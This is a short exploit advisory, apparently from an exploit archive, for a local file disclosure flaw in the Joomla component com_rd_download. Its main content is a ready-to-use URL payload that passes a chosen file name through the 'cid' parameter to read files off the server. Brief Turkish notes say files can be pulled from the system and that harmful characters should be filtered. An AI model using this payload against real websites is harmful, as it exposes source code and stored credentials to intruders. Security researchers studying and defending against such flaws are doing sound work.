id: 10511
date: 12/30/2009
title: Joomla Component com_rd_download Local File Disclosure Vulnerability
author: Fl0riX
cves: 

====================================================================
Joomla Component com_rd_download Local File Disclosure Vulnerability
====================================================================

<------------------- header data start ------------------- >
 
#############################################################
#        Joomla Component com_rd_download Local File Disclosure Vulnerability
#############################################################
 
# Author          :  FL0RiX
 
# Greez          : Deep-Power,PyskE,Ruzgarin_oglu And All Friends
 
# Name            : com_rd_download
 
# Bug Type        : Local File Disclosure
 
# Infection       : sistemden dosya ?ekilebilir
 
# Bug Fix Advice : zararl&#305; karakterler filtrelenmeli
 
#############################################################
 
< ------------------- header data end of ------------------- >
 
< -- bug code start -- >
 
path/index.php?option=com_rd_download&view=download&cid=[DOSYADI].php
 
< -- bug code end of -- >



#  0day.today [2023-03-26]  #